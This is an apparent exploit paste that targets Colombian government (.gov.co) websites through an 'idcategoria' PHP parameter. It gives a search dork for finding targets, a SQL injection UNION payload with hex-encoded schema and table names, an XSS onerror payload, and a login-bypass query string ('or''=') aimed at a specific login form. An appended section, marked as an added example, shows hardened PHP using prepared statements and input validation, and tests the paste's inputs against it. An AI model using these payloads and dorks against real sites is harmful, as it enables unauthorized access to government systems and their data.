Kyfx

Bypass Access Domains GOV.CO

Dec 12th, 2015
# Type: php

------------------- Agreement --------------------
[20/11/2012] - Vulnerability discovered
[23/11/2012] - Vendor notified, did not respond
[24/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/index.php?idcategoria= < Sql Vulnerability Path >
http://site.com/index.php?idcategoria= < Xss Vulnerability Path >

# Exploit/Command/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12--
# Exploit/Command/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Payload/Command/Sql=> table_schema=0x6C5F61646D696E69737475F61646D696E / table_name=0x7462261646F72706172726F717569

Access bypass "user:password 'or''='" .gov.co .co website..BUG

dork inurl: index.php?idcategoria=11

<form method="POST" name="forma" action="index.php?idcategoria=11" class="login">

-> index.php?usuario='or''='&password='or''='
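
A hardened counterpart to the login form and `idcategoria` parameter shown above, added here as an example (not code from the paste or from the affected application). It assumes PHP with the pdo_sqlite extension; the table names, column names and sample rows are hypothetical.

```php
<?php
// Added example: hardened handling of usuario/password and idcategoria.
// Schema (usuarios, categorias) and sample rows are constructed for illustration.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE usuarios (usuario TEXT PRIMARY KEY, hash TEXT)');
$db->exec('CREATE TABLE categorias (id INTEGER PRIMARY KEY, titulo TEXT)');
$db->prepare('INSERT INTO usuarios VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO categorias VALUES (11, 'Acceso')");

function login(PDO $db, string $usuario, string $password): bool
{
    // Bound parameter: quotes in $usuario are data, never SQL syntax.
    $stmt = $db->prepare('SELECT hash FROM usuarios WHERE usuario = ?');
    $stmt->execute([$usuario]);
    $hash = $stmt->fetchColumn();
    // The password is checked against a stored hash, not inside the query,
    // so no input can turn the WHERE clause into a tautology.
    return is_string($hash) && password_verify($password, $hash);
}

function categoria(PDO $db, string $raw): ?string
{
    // idcategoria must be a positive integer; a trailing quote or UNION is rejected.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT titulo FROM categorias WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $titulo = $stmt->fetchColumn();
    // Encode on output so markup in a stored or reflected value is inert.
    return $titulo === false
        ? null
        : htmlspecialchars((string) $titulo, ENT_QUOTES, 'UTF-8');
}

// Inputs taken from the paste, then a legitimate request for comparison.
var_dump(login($db, "'or''='", "'or''='"));
var_dump(login($db, 'admin', 'correct horse'));
var_dump(categoria($db, "11'"));
var_dump(categoria($db, '11'));
```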

# Demo_Xss_Sql_Vulnerabilities